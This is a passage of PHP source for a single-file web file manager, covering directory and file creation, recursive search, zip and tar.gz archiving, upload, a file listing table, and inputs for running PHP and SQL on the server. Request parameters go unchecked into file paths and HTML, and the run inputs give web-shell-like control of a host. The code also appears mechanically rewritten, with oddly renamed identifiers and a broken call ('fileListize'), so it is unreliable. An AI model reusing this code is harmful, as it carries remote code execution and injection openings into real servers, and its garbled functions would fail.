	                    } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
                   
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
            $msg_mx .= __('Error occurred');

        } else {
	                    	                    	                    $msg_mx .= __('Created').' '.$_REQUEST['dirname'];

	                    	                    }
            
    } elseif(!empty($_POST['search_recursive'])) {
	                    	                    ini_set('max_execution_time', '0');
	                    	                    $search_data =  find_text_in_fileList($_POST['path'], $_POST['mask'], $_POST['search_recursive']);
           
	                    	                    if(!empty($search_data)) {
                  
	                    	                    	                    $msg_mx .= __('Found in fileList').' ('.count($search_data).'):<br>';
	                    	                    	                    foreach ($search_data as $filename) {

	                    	                    	                    	                    $msg_mx .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';
	                    	                    	                    }
                    
	                    	                    } else {
                  
	                    	                    	                    $msg_mx .= __('Nothing founded');
                  
	                    	                    }	                    
                 
	                    } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_mx .= __('Error occurred');
        } else {
         
	                    	                    	                    fclose($fp);

	                    	                    	                    $msg_mx .= __('Created').' '.$_REQUEST['filename'];
         
	                    	                    }
    } elseif (isset($_GET['zip'])) {
	                    	                    $source = base64_decode($_GET['zip']);
               
	                    	                    $destination = basename($source).'.zip';
                 
	                    	                    set_time_limit(0);
                  
	                    	                    $phar = new PharData($destination);
              
	                    	                    $phar->buildFromDirectory($source);

	                    	                    if (is_file($destination))
             
	                    	                    $msg_mx .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	                    	                    '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)

	                    	                    .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
                 
	                    	                    else $msg_mx .= __('Error occurred').': '.__('no fileList');
	                    } elseif (isset($_GET['gz'])) {
	                    	                    $source = base64_decode($_GET['gz']);

	                    	                    $archive = $source.'.tar';
               
	                    	                    $destination = basename($source).'.tar';
               
	                    	                    if (is_file($archive)) unlink($archive);

	                    	                    if (is_file($archive.'.gz')) unlink($archive.'.gz');

	                    	                    clearstatcache();
              
	                    	                    set_time_limit(0);

	                    	                    //die();

	                    	                    $phar = new PharData($destination);

	                    	                    $phar->buildFromDirectory($source);

	                    	                    $phar->compress(Phar::GZ,'.tar.gz');
	                    	                    unset($phar);
	                    	                    if (is_file($archive)) {

	                    	                    	                    if (is_file($archive.'.gz')) {
	                    	                    	                    	                    unlink($archive); 

	                    	                    	                    	                    $destination .= '.gz';

	                    	                    	                    }



	                    	                    	                    $msg_mx .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	                    	                    	                    '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)

	                    	                    	                    .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
	                    	                    } else $msg_mx .= __('Error occurred').': '.__('no fileList');

	                    } elseif (isset($_GET['decompress'])) {
                  
	                    	                    // $source = base64_decode($_GET['decompress']);

	                    	                    // $destination = basename($source);

	                    	                    // $ext = end(explode(".", $destination));
               
	                    	                    // if ($ext=='zip' OR $ext=='gz') {

	                    	                    	                    // $phar = new PharData($source);
	                    	                    	                    // $phar->decompress();
	                    	                    	                    // $base_file = str_replace('.'.$ext,'',$destination);

	                    	                    	                    // $ext = end(explode(".", $base_file));
	                    	                    	                    // if ($ext=='tar'){
          
	                    	                    	                    	                    // $phar = new PharData($base_file);
                  
	                    	                    	                    	                    // $phar->extractTo(dir($source));

	                    	                    	                    // }

	                    	                    // } 
	                    	                    // $msg_mx .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	                    } elseif (isset($_GET['gzfile'])) {
	                    	                    $source = base64_decode($_GET['gzfile']);

	                    	                    $archive = $source.'.tar';

	                    	                    $destination = basename($source).'.tar';

	                    	                    if (is_file($archive)) unlink($archive);

	                    	                    if (is_file($archive.'.gz')) unlink($archive.'.gz');
                  
	                    	                    set_time_limit(0);
                    
	                    	                    //echo $destination;
                   
	                    	                    $ext_arr = explode('.',basename($source));
                   
	                    	                    if (isset($ext_arr[1])) {
                  
	                    	                    	                    unset($ext_arr[0]);

	                    	                    	                    $ext=implode('.',$ext_arr);
                    
	                    	                    } 
                
	                    	                    $phar = new PharData($destination);

	                    	                    $phar->addFile($source);

	                    	                    $phar->compress(Phar::GZ,$ext.'.tar.gz');

	                    	                    unset($phar);

	                    	                    if (is_file($archive)) {

	                    	                    	                    if (is_file($archive.'.gz')) {

	                    	                    	                    	                    unlink($archive); 

	                    	                    	                    	                    $destination .= '.gz';
	                    	                    	                    }

	                    	                    	                    $msg_mx .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	                    	                    	                    '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                  
	                    	                    	                    .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

	                    	                    } else $msg_mx .= __('Error occurred').': '.__('no fileList');
           
	                    }
         
?>
            
<table class="whole" id="header_table" >

<tr>

    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
           
</tr>
<?php if(!empty($msg_mx)){ ?>

<tr>
	                    <td colspan="2" class="row2"><?=$msg_mx?></td>
             
</tr>
                    
<?php } ?>
           
<tr>
    <td class="row2">
	                    	                    <table>
          
	                    	                    	                    <tr>
	                    	                    	                    <td>

	                    	                    	                    	                    <?=fm_home()?>

	                    	                    	                    </td>
             
	                    	                    	                    <td>

	                    	                    	                    <?php if(!empty($fm_config['make_directory'])) { ?>
                 
	                    	                    	                    	                    <form method="post" action="<?=$url_inc?>">
                    
	                    	                    	                    	                    <input type="hidden" name="path" value="<?=$path?>" />

	                    	                    	                    	                    <input type="text" name="dirname" size="15">

	                    	                    	                    	                    <input type="submit" name="mkdir" value="<?=__('Make directory')?>">
	                    	                    	                    	                    </form>
	                    	                    	                    <?php } ?>
                
	                    	                    	                    </td>

	                    	                    	                    <td>

	                    	                    	                    <?php if(!empty($fm_config['new_file'])) { ?>
	                    	                    	                    	                    <form method="post" action="<?=$url_inc?>">

	                    	                    	                    	                    <input type="hidden" name="path"     value="<?=$path?>" />
          
	                    	                    	                    	                    <input type="text"   name="filename" size="15">
	                    	                    	                    	                    <input type="submit" name="mkfile"   value="<?=__('New file')?>">
	                    	                    	                    	                    </form>
        
	                    	                    	                    <?php } ?>
	                    	                    	                    </td>
	                    	                    	                    <td>

	                    	                    	                    	                    <form  method="post" action="<?=$url_inc?>" style="display:inline">

	                    	                    	                    	                    <input type="hidden" name="path" value="<?=$path?>" />

	                    	                    	                    	                    <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">

	                    	                    	                    	                    <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
            
	                    	                    	                    	                    <input type="submit" name="search" value="<?=__('Search')?>">
                 
	                    	                    	                    	                    </form>
          
	                    	                    	                    </td>

	                    	                    	                    <td>
	                    	                    	                    <?=fm_run_input('php')?>

	                    	                    	                    </td>
	                    	                    	                    <td>

	                    	                    	                    <?=fm_run_input('sql')?>
                
	                    	                    	                    </td>

	                    	                    	                    </tr>

	                    	                    </table>

    </td>

    <td class="row3">
	                    	                    <table>

	                    	                    <tr>

	                    	                    <td>
              
	                    	                    <?php if (!empty($fm_config['upload_file'])) { ?>
                
	                    	                    	                    <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">

	                    	                    	                    <input type="hidden" name="path" value="<?=$path?>" />

	                    	                    	                    <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

	                    	                    	                    <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
              
	                    	                    	                    <input type="submit" name="test" value="<?=__('Upload')?>" />

	                    	                    	                    </form>

	                    	                    <?php } ?>

	                    	                    </td>
                  
	                    	                    <td>

	                    	                    <?php if ($auth_ok['authorize']) { ?>

	                    	                    	                    <form action="" method="post">&nbsp;&nbsp;&nbsp;
	                    	                    	                    <input name="quit" type="hidden" value="1">

	                    	                    	                    <?=__('Hello')?>, <?=$auth_ok['login']?>

	                    	                    	                    <input type="submit" value="<?=__('Quit')?>">
                   
	                    	                    	                    </form>
             
	                    	                    <?php } ?>

	                    	                    </td>

	                    	                    <td>

	                    	                    <?=fm_lang_form($language)?>

	                    	                    </td>
	                    	                    <tr>

	                    	                    </table>
    </td>
              
</tr>
</table>
                
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">

<thead>
<tr> 

    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>

    <th style="white-space:nowrap"> <?=__('Date')?> </th>

    <th style="white-space:nowrap"> <?=__('Rights')?> </th>

    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
              
</tr>
</thead>
<tbody>
         
<?php
$elements = fm_scan_dir($path, '', 'all', true);

$dirs = array();
$fileList = array();

foreach ($elements as $file){
                    
    if(@is_dir($path . $file)){

        $dirs[] = $file;

    } else {
        
        $fileList[] = $file;

    }

}
natsort($dirs); natsort($fileList);
        
$elements = array_merge($dirs, $fileList);

          
foreach ($elements as $file){

    $filename = $path . $file;

    $filedata = @stat($filename);
                  
    if(@is_dir($filename)){
	                    	                    $filedata[7] = '';
                   
	                    	                    if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);

        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';

        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);

	                    	                    $arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';

	                    	                     if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
          
    } else {

	                    	                    $link = 

	                    	                    	                    $fm_config['show_img']&&@getimagesize($filename) 

	                    	                    	                    ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
	                    	                    	                    . fm_img_link($filename)

	                    	                    	                    .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
	                    	                    	                    : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';

	                    	                    $e_arr = explode(".", $file);
                  
	                    	                    $ext = end($e_arr);

        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
	                    	                    $arlink = in_array($ext,array('zip','gz','tar')) 

	                    	                    ? ''
              
	                    	                    : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));

        $style = 'row1';
             
	                    	                    $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';

    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';

    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';

    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 

    <td><?=$link?></td>
         
    <td><?=$filedata[7]?></td>

    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>

    <td><?=$rightstext?></td>

    <td><?=$deletelink?></td>

    <td><?=$renamelink?></td>

    <td><?=$loadlink?></td>
                    
    <td><?=$arlink?></td>
           
</tr>

<?php

    }
               
}
           
?>

</tbody>
            
</table>
<div class="row3"><?php
	                    $mtime = explode(' ', microtime()); 
	                    $totaltime = $mtime[0] + $mtime[1] - $starttime; 

	                    echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';

	                    if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
                  
	                    if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();

	                    if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	                    if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	                    if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	                    if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
                  
	                    if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
         
	                    ?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
                    
	                    var element = document.createElement('a');
          
	                    element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	                    element.setAttribute('download', filename);

	                    element.style.display = 'none';
	                    document.body.appendChild(element);

	                    element.click();

	                    document.body.removeChild(element);

}



function base64_encode(m) {

	                    for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {

	                    	                    c = m.charCodeAt(l);
	                    	                    if (128 > c) d = 1;
	                    	                    else
                
	                    	                    	                    for (d = 2; c >= 2 << 5 * d;) ++d;

	                    	                    for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
                 
	                    }
               
	                    b && (g += k[f << 6 - b]);
	                    return g

}
                




var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
        
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
                 
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
            
                return c[p];

            })
                  
        }

    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {

            worksheet: name || 'Worksheet',
        
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")

        }

	                    	                    t = new Date();
                   
	                    	                    filename = 'fm_' + t.toISOString() + '.xls'

	                    	                    download_xls(filename, base64_encode(format(template, ctx)))

    }

})();


                   
var table2Excel = function () {

    var ua = window.navigator.userAgent;

    var msie = ua.indexOf("MSIE ");


         
	                    this.CreateExcelSheet = 
                  
	                    	                    function(el, name){
	                    	                    	                    if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer


	                    	                    	                    	                    var x = document.getElementById(el).rows;



	                    	                    	                    	                    var xls = new ActiveXObject("Excel.Application");


	                    	                    	                    	                    xls.visible = true;
                   
	                    	                    	                    	                    xls.Workbooks.Add
                
	                    	                    	                    	                    for (i = 0; i < x.length; i++) {

	                    	                    	                    	                    	                    var y = x[i].cells;

	                    	                    	                    	                    	                    for (j = 0; j < y.length; j++) {

	                    	                    	                    	                    	                    	                    xls.Cells(i + 1, j + 1).Value = y[j].innerText;
          
	                    	                    	                    	                    	                    }
	                    	                    	                    	                    }
	                    	                    	                    	                    xls.Visible = true;

	                    	                    	                    	                    xls.UserControl = true;

	                    	                    	                    	                    return xls;
         
	                    	                    	                    } else {
	                    	                    	                    	                    tableToExcelData(el, name);
	                    	                    	                    }

	                    	                    }
}

</script>
            
</body>

</html>


<?php

//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
              
	                    var $archiveIdentifier = '';
           
	                    var $temporaryFile = 0;
	                    var $currentFileLocation = 0;

	                    var $isCompressed = true;
               
	                    var $eventErrors = array();

	                    var $fileList = array();
                
	                    

	                    function __construct(){
                
	                    	                    if (!isset($this->eventErrors)) $this->eventErrors = array();

	                    }

	                    

	                    function generateArchive($file_list){
	                    	                    $result = false;
        
	                    	                    if (file_exists($this->archiveIdentifier) && is_file($this->archiveIdentifier)) 	                    $newArchive = false;

	                    	                    else $newArchive = true;
          
	                    	                    if ($newArchive){
	                    	                    	                    if (!$this->startWriteProcess()) return false;
	                    	                    } else {

	                    	                    	                    if (fileListize($this->archiveIdentifier) == 0)	                    return $this->startWriteProcess();

	                    	                    	                    if ($this->isCompressed) {

	                    	                    	                    	                    $this->closeTemporaryFile();
                 
	                    	                    	                    	                    if (!rename($this->archiveIdentifier, $this->archiveIdentifier.'.tmp')){
                   
	                    	                    	                    	                    	                    $this->eventErrors[] = __('Cannot rename').' '.$this->archiveIdentifier.__(' to ').$this->archiveIdentifier.'.tmp';

	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    }
                
	                    	                    	                    	                    $tmpArchive = gzopen($this->archiveIdentifier.'.tmp', 'rb');
            
	                    	                    	                    	                    if (!$tmpArchive){

	                    	                    	                    	                    	                    $this->eventErrors[] = $this->archiveIdentifier.'.tmp '.__('is not readable');
	                    	                    	                    	                    	                    rename($this->archiveIdentifier.'.tmp', $this->archiveIdentifier);
         
	                    	                    	                    	                    	                    return false;
         
	                    	                    	                    	                    }
                   
	                    	                    	                    	                    if (!$this->startWriteProcess()){
                    
	                    	                    	                    	                    	                    rename($this->archiveIdentifier.'.tmp', $this->archiveIdentifier);

	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    }

	                    	                    	                    	                    $buffer = gzread($tmpArchive, 512);

	                    	                    	                    	                    if (!gzeof($tmpArchive)){

	                    	                    	                    	                    	                    do {
           
	                    	                    	                    	                    	                    	                    $binaryData = pack('a512', $buffer);
          
	                    	                    	                    	                    	                    	                    $this->writeFileBlock($binaryData);

	                    	                    	                    	                    	                    	                    $buffer = gzread($tmpArchive, 512);

	                    	                    	                    	                    	                    }

	                    	                    	                    	                    	                    while (!gzeof($tmpArchive));
	                    	                    	                    	                    }

	                    	                    	                    	                    gzclose($tmpArchive);

	                    	                    	                    	                    unlink($this->archiveIdentifier.'.tmp');
           
	                    	                    	                    } else {

	                    	                    	                    	                    $this->temporaryFile = fopen($this->archiveIdentifier, 'r+b');
	                    	                    	                    	                    if (!$this->temporaryFile)	                    return false;
                 
	                    	                    	                    }
         
	                    	                    }

	                    	                    if (isset($file_list) && is_array($file_list)) {

	                    	                    if (count($file_list)>0)
	                    	                    	                    $result = $this->bundleFiles($file_list);

	                    	                    } else $this->eventErrors[] = __('No file').__(' to ').__('Archive');

	                    	                    if (($result)&&(is_resource($this->temporaryFile))){

	                    	                    	                    $binaryData = pack('a512', '');

	                    	                    	                    $this->writeFileBlock($binaryData);

	                    	                    }

	                    	                    $this->closeTemporaryFile();

	                    	                    if ($newArchive && !$result){
        
	                    	                    $this->closeTemporaryFile();

	                    	                    unlink($this->archiveIdentifier);

	                    	                    }
           
	                    	                    return $result;
	                    }


	                    function recoverArchive($path){
                   
	                    	                    $fileName = $this->archiveIdentifier;

	                    	                    if (!$this->isCompressed){

	                    	                    	                    if (file_exists($fileName)){
           
	                    	                    	                    	                    if ($fp = fopen($fileName, 'rb')){

	                    	                    	                    	                    	                    $data = fread($fp, 2);
	                    	                    	                    	                    	                    fclose($fp);

	                    	                    	                    	                    	                    if ($data == '\37\213'){
               
	                    	                    	                    	                    	                    	                    $this->isCompressed = true;

	                    	                    	                    	                    	                    }

	                    	                    	                    	                    }

	                    	                    	                    }
	                    	                    	                    elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isCompressed = true;
	                    	                    } 

	                    	                    $result = true;

	                    	                    if ($this->isCompressed) $this->temporaryFile = gzopen($fileName, 'rb');

	                    	                    else $this->temporaryFile = fopen($fileName, 'rb');
	                    	                    if (!$this->temporaryFile){
                  
	                    	                    	                    $this->eventErrors[] = $fileName.' '.__('is not readable');

	                    	                    	                    return false;
	                    	                    }
	                    	                    $result = $this->unbundleFiles($path);
	                    	                    	                    $this->closeTemporaryFile();

	                    	                    return $result;

	                    }



	                    function displayErrors	                    ($message = '') {

	                    	                    $Errors = $this->eventErrors;
                  
	                    	                    if(count($Errors)>0) {

	                    	                    if (!empty($message)) $message = ' ('.$message.')';

	                    	                    	                    $message = __('Error occurred').$message.': <br/>';
	                    	                    	                    foreach ($Errors as $value)
	                    	                    	                    	                    $message .= $value.'<br/>';

	                    	                    	                    return $message;	                    
	                    	                    } else return '';
                 
	                    	                    

	                    }

	                    
	                    function bundleFiles($file_array){

	                    	                    $result = true;
	                    	                    if (!$this->temporaryFile){
	                    	                    	                    $this->eventErrors[] = __('Invalid file descriptor');
	                    	                    	                    return false;
	                    	                    }

	                    	                    if (!is_array($file_array) || count($file_array)<=0)
          return true;

	                    	                    for ($i = 0; $i<count($file_array); $i++){
                 
	                    	                    	                    $filename = $file_array[$i];

	                    	                    	                    if ($filename == $this->archiveIdentifier)
                    
	                    	                    	                    	                    continue;

	                    	                    	                    if (strlen($filename)<=0)
	                    	                    	                    	                    continue;
	                    	                    	                    if (!file_exists($filename)){

	                    	                    	                    	                    $this->eventErrors[] = __('No file').' '.$filename;

	                    	                    	                    	                    continue;

	                    	                    	                    }

	                    	                    	                    if (!$this->temporaryFile){

	                    	                    	                    $this->eventErrors[] = __('Invalid file descriptor');
	                    	                    	                    return false;
	                    	                    	                    }

	                    	                    if (strlen($filename)<=0){

	                    	                    	                    $this->eventErrors[] = __('Filename').' '.__('is incorrect');;
	                    	                    	                    return false;

	                    	                    }

	                    	                    $filename = str_replace('\\', '/', $filename);

	                    	                    $keep_filename = $this->createValidPath($filename);

	                    	                    if (is_file($filename)){
	                    	                    	                    if (($file = fopen($filename, 'rb')) == 0){
	                    	                    	                    	                    $this->eventErrors[] = __('Mode ').__('is incorrect');

	                    	                    	                    }

	                    	                    	                    	                    if(($this->currentFileLocation == 0)){
	                    	                    	                    	                    	                    if(!$this->writeFileHeader($filename, $keep_filename))

	                    	                    	                    	                    	                    	                    return false;
	                    	                    	                    	                    }

	                    	                    	                    	                    while (($buffer = fread($file, 512)) != ''){
	                    	                    	                    	                    	                    $binaryData = pack('a512', $buffer);

	                    	                    	                    	                    	                    $this->writeFileBlock($binaryData);
             
	                    	                    	                    	                    }
	                    	                    	                    fclose($file);
	                    	                    }	                    else $this->writeFileHeader($filename, $keep_filename);
	                    	                    	                    if (@is_dir($filename)){

	                    	                    	                    	                    if (!($handle = opendir($filename))){
	                    	                    	                    	                    	                    $this->eventErrors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');

	                    	                    	                    	                    	                    continue;
	                    	                    	                    	                    }

	                    	                    	                    	                    while (false !== ($dir = readdir($handle))){

	                    	                    	                    	                    	                    if ($dir!='.' && $dir!='..'){
	                    	                    	                    	                    	                    	                    $file_array_tmp = array();

	                    	                    	                    	                    	                    	                    if ($filename != '.')

	                    	                    	                    	                    	                    	                    	                    $file_array_tmp[] = $filename.'/'.$dir;
                
	                    	                    	                    	                    	                    	                    else
	                    	                    	                    	                    	                    	                    	                    $file_array_tmp[] = $dir;



	                    	                    	                    	                    	                    	                    $result = $this->bundleFiles($file_array_tmp);

	                    	                    	                    	                    	                    }

	                    	                    	                    	                    }
                   
	                    	                    	                    	                    unset($file_array_tmp);

	                    	                    	                    	                    unset($dir);

	                    	                    	                    	                    unset($handle);

	                    	                    	                    }

	                    	                    }

	                    	                    return $result;
	                    }


	                    function unbundleFiles($path){ 

	                    	                    $path = str_replace('\\', '/', $path);

	                    	                    if ($path == ''	                    || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	                    $path = './'.$path;

	                    	                    clearstatcache();

	                    	                    while (strlen($binaryData = $this->readFileBlock()) != 0){

	                    	                    	                    if (!$this->readFileHeader($binaryData, $header)) return false;
                    
	                    	                    	                    if ($header['filename'] == '') continue;

	                    	                    	                    if ($header['typeflag'] == 'L'){	                    	                    	                    //reading long header
             
	                    	                    	                    	                    $filename = '';

	                    	                    	                    	                    $decr = floor($header['size']/512);

	                    	                    	                    	                    for ($i = 0; $i < $decr; $i++){
                
	                    	                    	                    	                    	                    $content = $this->readFileBlock();
        
	                    	                    	                    	                    	                    $filename .= $content;

	                    	                    	                    	                    }
               
	                    	                    	                    	                    if (($laspiece = $header['size'] % 512) != 0){
	                    	                    	                    	                    	                    $content = $this->readFileBlock();

	                    	                    	                    	                    	                    $filename .= substr($content, 0, $laspiece);
	                    	                    	                    	                    }
	                    	                    	                    	                    $binaryData = $this->readFileBlock();
	                    	                    	                    	                    if (!$this->readFileHeader($binaryData, $header)) return false;

	                    	                    	                    	                    else $header['filename'] = $filename;

	                    	                    	                    	                    return true;
          
	                    	                    	                    }

	                    	                    	                    if (($path != './') && ($path != '/')){

	                    	                    	                    	                    while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);

	                    	                    	                    	                    if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];

	                    	                    	                    	                    else $header['filename'] = $path.'/'.$header['filename'];
	                    	                    	                    }

	                    	                    	                    

	                    	                    	                    if (file_exists($header['filename'])){

	                    	                    	                    	                    if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){

	                    	                    	                    	                    	                    $this->eventErrors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    }

	                    	                    	                    	                    if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
	                    	                    	                    	                    	                    $this->eventErrors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
                 
	                    	                    	                    	                    	                    return false;
                    
	                    	                    	                    	                    }
              
	                    	                    	                    	                    if (!is_writeable($header['filename'])){

	                    	                    	                    	                    	                    $this->eventErrors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');

	                    	                    	                    	                    	                    return false;
                   
	                    	                    	                    	                    }
	                    	                    	                    } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){

	                    	                    	                    	                    $this->eventErrors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
                   
	                    	                    	                    	                    return false;

	                    	                    	                    }


	                    	                    	                    if ($header['typeflag'] == '5'){
            
	                    	                    	                    	                    if (!file_exists($header['filename']))	                    	                    {
	                    	                    	                    	                    	                    if (!mkdir($header['filename'], 0777))	                    {

	                    	                    	                    	                    	                    	                    

	                    	                    	                    	                    	                    	                    $this->eventErrors[] = __('Cannot create directory').' '.$header['filename'];

	                    	                    	                    	                    	                    	                    return false;
	                    	                    	                    	                    	                    } 

	                    	                    	                    	                    }

	                    	                    	                    } else {

	                    	                    	                    	                    if (($destination = fopen($header['filename'], 'wb')) == 0) {

	                    	                    	                    	                    	                    $this->eventErrors[] = __('Cannot write to file').' '.$header['filename'];
             
	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    } else {
             
	                    	                    	                    	                    	                    $decr = floor($header['size']/512);

	                    	                    	                    	                    	                    for ($i = 0; $i < $decr; $i++) {
                  
	                    	                    	                    	                    	                    	                    $content = $this->readFileBlock();
                 
	                    	                    	                    	                    	                    	                    fwrite($destination, $content, 512);

	                    	                    	                    	                    	                    }

	                    	                    	                    	                    	                    if (($header['size'] % 512) != 0) {
                    
	                    	                    	                    	                    	                    	                    $content = $this->readFileBlock();

	                    	                    	                    	                    	                    	                    fwrite($destination, $content, ($header['size'] % 512));

	                    	                    	                    	                    	                    }
